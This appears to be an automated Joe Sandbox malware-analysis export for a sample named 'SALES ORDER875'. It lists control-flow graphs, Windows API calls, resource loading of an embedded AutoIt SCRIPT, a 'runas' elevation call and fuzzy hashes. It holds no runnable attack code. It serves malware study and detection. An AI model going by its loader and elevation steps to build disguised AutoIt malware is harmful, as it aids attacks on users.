GetSystemInfo 264->266 274 38449c-3844a6 GetSystemInfo 265->274 275 384460-38446e GetProcAddress 265->275 267->252 268->252 276 3c3726-3c372f 269->276 277 3843e3-3843e5 269->277 279 3c3704-3c3710 270->279 280 3c3715-3c3721 270->280 271->252 278 3c37ee 272->278 281 3c380b-3c381a 273->281 282 3c37f4-3c37fc 273->282 284 384476-384478 274->284 275->274 283 384470-384474 GetNativeSystemInfo 275->283 287 3c373c-3c3748 276->287 288 3c3731-3c3737 276->288 285 3c374d-3c3762 277->285 286 3843eb-3843ee 277->286 278->282 279->252 280->252 281->278 289 3c381c-3c3822 281->289 282->273 283->284 292 38447a-38447b FreeLibrary 284->292 293 384481-384493 284->293 290 3c376f-3c377b 285->290 291 3c3764-3c376a 285->291 294 3843f4-38440f 286->294 295 3c3791-3c3794 286->295 287->252 288->252 289->282 290->252 291->252 292->293 297 3c3780-3c378c 294->297 298 384415 294->298 295->252 296 3c379a-3c37c1 295->296 299 3c37ce-3c37da 296->299 300 3c37c3-3c37c9 296->300 297->252 298->252 299->252 300->252
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0038430D
                                                                                                                                                                                      • Part of subcall function 00386B57: _wcslen.LIBCMT ref: 00386B6A
                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(?,0041CB64,00000000,?,?), ref: 00384422
                                                                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00384429
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00384454
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00384466
                                                                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00384474
                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0038447B
                                                                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 003844A0
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                                                                                    • Opcode ID: 187a4d2cef71859ec8d3616dbf95daeeefdc2a968bb81230ad564c5164132a38
                                                                                                                                                                                    • Instruction ID: a9d964d4827529883e93f8b65374b3ccb3946b91d73996199667ce47b9058e2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 187a4d2cef71859ec8d3616dbf95daeeefdc2a968bb81230ad564c5164132a38
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1A1926591A3C0DFE713D76A7CA17957FA86F26346B0888FDD841D3A33D224C918CB29

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 1270 3842a2-3842ba CreateStreamOnHGlobal 1271 3842da-3842dd 1270->1271 1272 3842bc-3842d3 FindResourceExW 1270->1272 1273 3842d9 1272->1273 1274 3c35ba-3c35c9 LoadResource 1272->1274 1273->1271 1274->1273 1275 3c35cf-3c35dd SizeofResource 1274->1275 1275->1273 1276 3c35e3-3c35ee LockResource 1275->1276 1276->1273 1277 3c35f4-3c3612 1276->1277 1277->1273
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,003850AA,?,?,00000000,00000000), ref: 003842B2
                                                                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,003850AA,?,?,00000000,00000000), ref: 003842C9
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,003850AA,?,?,00000000,00000000,?,?,?,?,?,?,00384F20), ref: 003C35BE
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,003850AA,?,?,00000000,00000000,?,?,?,?,?,?,00384F20), ref: 003C35D3
                                                                                                                                                                                    • LockResource.KERNEL32(003850AA,?,?,003850AA,?,?,00000000,00000000,?,?,?,?,?,?,00384F20,?), ref: 003C35E6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                                                                    • String ID: SCRIPT
                                                                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                                                                    • Opcode ID: e3abc7f4ef116f3c4d631dd574ed934716ff31428592dcdaddeb43508d95eb5c
                                                                                                                                                                                    • Instruction ID: f5d8324f3d1fb1555058fff4e23e5f5ea926e13e63227c526b5a8dbff571dd08
                                                                                                                                                                                    • Opcode Fuzzy Hash: e3abc7f4ef116f3c4d631dd574ed934716ff31428592dcdaddeb43508d95eb5c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8211AC70240305BFD7229B65DC88F677BB9EBC9B55F2085A9B402C6650DB71DC008760

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00382B6B
                                                                                                                                                                                      • Part of subcall function 00383A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00451418,?,00382E7F,?,?,?,00000000), ref: 00383A78
                                                                                                                                                                                      • Part of subcall function 00389CB3: _wcslen.LIBCMT ref: 00389CBD
                                                                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00442224), ref: 003C2C10
                                                                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00442224), ref: 003C2C17
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                                                                    • String ID: runas
                                                                                                                                                                                    • API String ID: 448630720-4000483414
                                                                                                                                                                                    • Opcode ID: 34aae34558b6d48e19406308de18aa10f4b911a5c52e1976604859ade33f07df
                                                                                                                                                                                    • Instruction ID: 348c80c48d150f2d9971258607f445d953e35a910df5d0ab030aa452934cba2c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 34aae34558b6d48e19406308de18aa10f4b911a5c52e1976604859ade33f07df
                                                                                                                                                                                    • Instruction Fuzzy Hash: A211D3312083016AC707FF60DC92EBEB7A8AF91741F4454AEF4825B1A3CF658A4AC716
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                                                                    • String ID: p#E
                                                                                                                                                                                    • API String ID: 3964851224-330265404
                                                                                                                                                                                    • Opcode ID: f696a6f2cfff7bb44f3a7187c27fc3ced0ff379648ef2b1f58c2c6b9eb090040
                                                                                                                                                                                    • Instruction ID: 07d126d72affdeb4c96fee9469935ed3c3fbcff00016286b54f8fe61888851c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: f696a6f2cfff7bb44f3a7187c27fc3ced0ff379648ef2b1f58c2c6b9eb090040
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77A28E71608301CFDB16DF24D480B2AB7E5BF89304F1599AEE9898B352D771EC45CBA2
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetInputState.USER32 ref: 0038D807
                                                                                                                                                                                    • timeGetTime.WINMM ref: 0038DA07
                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038DB28
                                                                                                                                                                                    • TranslateMessage.USER32(?), ref: 0038DB7B
                                                                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0038DB89
                                                                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0038DB9F
                                                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0038DBB1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2189390790-0
                                                                                                                                                                                    • Opcode ID: ce8bb98e26e3e8c0f586ed38f1b54bd532785d8558dcdb81e0915522bf91979d
                                                                                                                                                                                    • Instruction ID: 30f3b06076011d8fa96a7d6843521ddf920fe803324feb13e91efe640cd1c491
                                                                                                                                                                                    • Opcode Fuzzy Hash: ce8bb98e26e3e8c0f586ed38f1b54bd532785d8558dcdb81e0915522bf91979d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 69420231608341EFD72BEF24D884BAAB7E4BF56314F1585AAE4568B3D1D770E844CB82

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00382D07
                                                                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00382D31
                                                                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00382D42
                                                                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00382D5F
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00382D6F
                                                                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00382D85
                                                                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00382D94
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                                                                    • Opcode ID: 126111dd6631edc7a242462e749a4cf691d09dc841e9cc8fc2699f013eff4494
                                                                                                                                                                                    • Instruction ID: 084700fb13452863d587bb6d0eaf481e7b14e9023619eb662b5ced6383318fa7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 126111dd6631edc7a242462e749a4cf691d09dc841e9cc8fc2699f013eff4494
                                                                                                                                                                                    • Instruction Fuzzy Hash: AD21E0B5981309AFDB00DFA4ED89BDDBBB4FB08701F00812AF911A62A0D7B58540CF98

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 302 3c065b-3c068b call 3c042f 305 3c068d-3c0698 call 3af2c6 302->305 306 3c06a6-3c06b2 call 3b5221 302->306 311 3c069a-3c06a1 call 3af2d9 305->311 312 3c06cb-3c0714 call 3c039a 306->312 313 3c06b4-3c06c9 call 3af2c6 call 3af2d9 306->313 320 3c097d-3c0983 311->320 322 3c0716-3c071f 312->322 323 3c0781-3c078a GetFileType 312->323 313->311 324 3c0756-3c077c GetLastError call 3af2a3 322->324 325 3c0721-3c0725 322->325 326 3c078c-3c07bd GetLastError call 3af2a3 CloseHandle 323->326 327 3c07d3-3c07d6 323->327 324->311 325->324 329 3c0727-3c0754 call 3c039a 325->329 326->311 341 3c07c3-3c07ce call 3af2d9 326->341 332 3c07df-3c07e5 327->332 333 3c07d8-3c07dd 327->333 329->323 329->324 334 3c07e9-3c0837 call 3b516a 332->334 335 3c07e7 332->335 333->334 344 3c0839-3c0845 call 3c05ab 334->344 345 3c0847-3c086b call 3c014d 334->345 335->334 341->311 344->345 351 3c086f-3c0879 call 3b86ae 344->351 352 3c086d 345->352 353 3c087e-3c08c1 345->353 351->320 352->351 354 3c08e2-3c08f0 353->354 355 3c08c3-3c08c7 353->355 358 3c097b 354->358 359 3c08f6-3c08fa 354->359 355->354 357 3c08c9-3c08dd 355->357 357->354 358->320 359->358 361 3c08fc-3c092f CloseHandle call 3c039a 359->361 364 3c0931-3c095d GetLastError call 3af2a3 call 3b5333 361->364 365 3c0963-3c0977 361->365 364->365 365->358
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 003C039A: CreateFileW.KERNELBASE(00000000,00000000,?,003C0704,?,?,00000000,?,003C0704,00000000,0000000C), ref: 003C03B7
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003C076F
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003C0776
                                                                                                                                                                                    • GetFileType.KERNELBASE(00000000), ref: 003C0782
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003C078C
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003C0795
                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 003C07B5
                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 003C08FF
                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 003C0931
                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 003C0938
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                    • String ID: H
                                                                                                                                                                                    • API String ID: 4237864984-2852464175
                                                                                                                                                                                    • Opcode ID: c3db865288175cf9b5d41f73c528b8df9180be86766aae7cb0c90c059c0f1de9
                                                                                                                                                                                    • Instruction ID: 340255a0bc25c06ead2e9315f2e6cc58519f07faf4703a47d16857ddf6f51dc3
                                                                                                                                                                                    • Opcode Fuzzy Hash: c3db865288175cf9b5d41f73c528b8df9180be86766aae7cb0c90c059c0f1de9
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46A11536A042888FDF1EAF68DC91BAE7BA0EB06320F14415DF815DF292D7319D12CB91

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00383A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00451418,?,00382E7F,?,?,?,00000000), ref: 00383A78
                                                                                                                                                                                      • Part of subcall function 00383357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00383379
                                                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0038356A
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 003C318D
                                                                                                                                                                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 003C31CE
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 003C3210
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003C3277
                                                                                                                                                                                    • _wcslen.LIBCMT ref: 003C3286
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                    • API String ID: 98802146-2727554177
                                                                                                                                                                                    • Opcode ID: f3cf60506431a9631e586a3756eaaac4df3d6f198ea18dd2d9c1f4df5ae2948f
                                                                                                                                                                                    • Instruction ID: a43e123f4a73bebafc913d727c395a8f64cd215ad96869b7e3778de6683c6756
                                                                                                                                                                                    • Opcode Fuzzy Hash: f3cf60506431a9631e586a3756eaaac4df3d6f198ea18dd2d9c1f4df5ae2948f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4B717B714083019EC705EF65DD819ABBBE8FF8A740B40486FF845DB162EBB4DA48CB55

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00382B8E
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00382B9D
                                                                                                                                                                                    • LoadIconW.USER32(00000063), ref: 00382BB3
                                                                                                                                                                                    • LoadIconW.USER32(000000A4), ref: 00382BC5
                                                                                                                                                                                    • LoadIconW.USER32(000000A2), ref: 00382BD7
                                                                                                                                                                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00382BEF
                                                                                                                                                                                    • RegisterClassExW.USER32(?), ref: 00382C40
                                                                                                                                                                                      • Part of subcall function 00382CD4: GetSysColorBrush.USER32(0000000F), ref: 00382D07
                                                                                                                                                                                      • Part of subcall function 00382CD4: RegisterClassExW.USER32(00000030), ref: 00382D31
                                                                                                                                                                                      • Part of subcall function 00382CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00382D42
                                                                                                                                                                                      • Part of subcall function 00382CD4: InitCommonControlsEx.COMCTL32(?), ref: 00382D5F
                                                                                                                                                                                      • Part of subcall function 00382CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00382D6F
                                                                                                                                                                                      • Part of subcall function 00382CD4: LoadIconW.USER32(000000A9), ref: 00382D85
                                                                                                                                                                                      • Part of subcall function 00382CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00382D94
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                    • String ID: #$0$AutoIt v3
                                                                                                                                                                                    • API String ID: 423443420-4155596026
                                                                                                                                                                                    • Opcode ID: 5bee34e4aceb1e8652764eb71fcccb4640849cd12f3859e16c25e94f1810ba64
                                                                                                                                                                                    • Instruction ID: 338092ec5129655f1da89a74629d7a653d8826d3d8260dff8dfe8d85be9a380b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5bee34e4aceb1e8652764eb71fcccb4640849cd12f3859e16c25e94f1810ba64
                                                                                                                                                                                    • Instruction Fuzzy Hash: DE214C74E40314ABEB109FA5EDA5BA97FB4FB08B51F00417AE901A66B1D3B18940CF98
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0038BB4E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1828908824.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1828886853.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829014645.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829201961.000000000044C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1829357746.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_380000_SALES ORDER875.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Init_thread_footer
                                                                                                                                                                                    • String ID: p#E$p#E$p#E$p#E$p%E$p%E$x#E$x#E
                                                                                                                                                                                    • API String ID: 1385522511-1639728339
                                                                                                                                                                                    • Opcode ID: 456051b681ca57aaef336861c04626b54128796b348e727adeab36b0f20f7cf4
                                                                                                                                                                                    • Instruction ID: 24ea2cb6c43f5c5ca2abadeba02b8b02f6687d4d723395a62f04bdccf620a805
                                                                                                                                                                                    • Opcode Fuzzy Hash: 456051b681ca57aaef336861c04626b54128796b348e727adeab36b0f20f7cf4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0332DD35A0030A9FCB1ADF64C894BBEB7B9EF45700F19809AE905AB361D774ED41CB50

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
